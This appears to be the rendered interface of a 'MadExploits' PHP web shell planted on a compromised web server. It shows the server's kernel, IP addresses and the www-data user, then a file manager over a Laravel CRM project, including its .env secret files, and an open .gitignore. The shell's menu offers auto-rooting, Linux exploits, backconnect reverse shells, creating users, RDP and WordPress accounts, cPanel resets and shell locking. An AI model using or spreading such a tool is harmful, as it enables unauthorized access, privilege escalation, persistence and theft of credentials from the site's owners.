Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
crm.sdgases.com.np /
sdg.amatya.biz-8 /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxrwxr-x
app
[ DIR ]
drwxrwxr-x
assets
[ DIR ]
drwxrwxr-x
bootstrap
[ DIR ]
drwxrwxr-x
config
[ DIR ]
drwxrwxr-x
database
[ DIR ]
drwxrwxr-x
node_modules
[ DIR ]
drwxrwxr-x
public
[ DIR ]
drwxrwxr-x
resources
[ DIR ]
drwxrwxr-x
routes
[ DIR ]
drwxrwxr-x
storage
[ DIR ]
drwxrwxr-x
stubs
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
vendor
[ DIR ]
drwxrwxr-x
.env
971
B
-rw-rw-r--
.env.save
944
B
-rw-rw-r--
.gitignore
1.06
KB
-rw-rw-r--
README.md
460
B
-rw-rw-r--
artisan
1.65
KB
-rwxrwxr-x
composer.json
2.01
KB
-rw-rw-r--
composer.lock
332.1
KB
-rw-rw-r--
package-lock.json
428.19
KB
-rw-rw-r--
package.json
557
B
-rw-rw-r--
phpunit.xml
1.17
KB
-rw-rw-r--
server.php
563
B
-rw-rw-r--
webpack.mix.js
594
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .gitignore
# These are some examples of commonly ignored file patterns. # You should customize this list as applicable to your project. # Learn more about .gitignore: # https://www.atlassian.com/git/tutorials/saving-changes/gitignore # Node artifact files node_modules/ #dist/ # Compiled Java class files *.class # Compiled Python bytecode *.py[cod] # Log files *.log /node_modules /public/hot /public/storage /public/vendor /storage/*.key /storage/framework /storage/logs /vendor /.idea /.vscode /.vagrant /storage /storage/framework /storage/framework/cache /storage/framework/cache/data /storage/framework/sessions /storage/cache Homestead.json Homestead.yaml npm-debug.log yarn-error.log # /public /public/uploads .env .phpunit.result.cache .DS_STORE /public/.DS_STORE /public/course # Package files *.jar # Maven target/ #dist/ # JetBrains IDE .idea/ # Unit test reports TEST*.xml # Generated by MacOS .DS_Store # Generated by Windows Thumbs.db # Applications *.app *.exe *.war # Large media files *.mp4 *.tiff *.avi *.flv *.mov *.wmv public/mix-manifest.json .gitignore
Close